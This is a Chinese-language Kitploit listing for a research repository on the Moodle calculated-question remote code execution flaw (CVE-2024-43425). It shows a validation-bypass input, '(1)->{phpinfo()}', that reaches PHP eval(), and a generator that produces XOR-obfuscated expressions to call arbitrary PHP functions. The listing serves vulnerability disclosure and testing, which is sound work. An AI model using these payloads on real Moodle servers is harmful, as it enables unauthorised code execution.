Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
moodle-rce-calculatedquestions — 用于分析 Moodle 计算题中 RCE 的脚本(CVE-2024-43425) | Kitploit
工具/GitHubGitHub/redteampentesting/moodle-rce-calculatedquestions
Payload生成漏洞分析代码分析漏洞利用Web应用程序漏洞利用学习与教育
GitHubredteampentesting/moodle-rce-calculatedquestions

moodle-rce-calculatedquestions

用于分析 Moodle 计算题中 RCE 的脚本(CVE-2024-43425)

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
19512年前尚未审核

测试Moodle计算题输入验证的脚本 (CVE-2024-43425)

本仓库包含博文 Back to School - Exploiting a Remote Code Execution Vulnerability in Moodle 的配套脚本,该博文描述了Moodle学习平台中的一个远程代码执行漏洞。

测试验证逻辑

validation 目录中的脚本可用于直接测试输入字符串对Moodle用于防止滥用PHP eval() 调用的验证逻辑。

所有代码片段均直接改编自 Moodle的源代码,使用 4.4.1版本 作为存在漏洞的版本,4.4.2版本 作为已修复的版本。脚本包含了 question/type/calculated/questiontype.php 文件中的相关部分。

validation.php 文件使用了存在漏洞的验证逻辑:

root@kitploit:~
$ php validation.php '(1)->{phpinfo()}'
phpinfo()
PHP Version => 8.3.10
[...]

本仓库还包含了修复版验证代码,位于 validation-fixed.php:

root@kitploit:~
$ php validation-fixed.php '(1)->{phpinfo()}'
error illegalformulasyntax with value: {phpinfo()}
[...]

生成函数名称

脚本 xor-generator.py 可用于基于变量函数生成表达式,这些表达式允许在存在漏洞的Moodle版本中调用任意PHP函数并传入单个数字参数:

root@kitploit:~
$ ./xor-generator.py 'PRINTF'
((acos(2) . 0+acos(2)) ^ (2 . 6 . 0 . 0 . 0 . 0) ^ (1 . 0 . 0 . 0 . -8) ^ (0 . -4 . 1 . 8 . 0) ^ (-8 . 3 . 1 . 0 . 0))

$ php -r '((acos(2) . 0+acos(2)) ^ (2 . 6 . 0 . 0 . 0 . 0) ^ (1 . 0 . 0 . 0 . -8) ^ (0 . -4 . 1 . 8 . 0) ^ (-8 . 3 . 1 . 0 . 0))("Test");'
Test
下载工具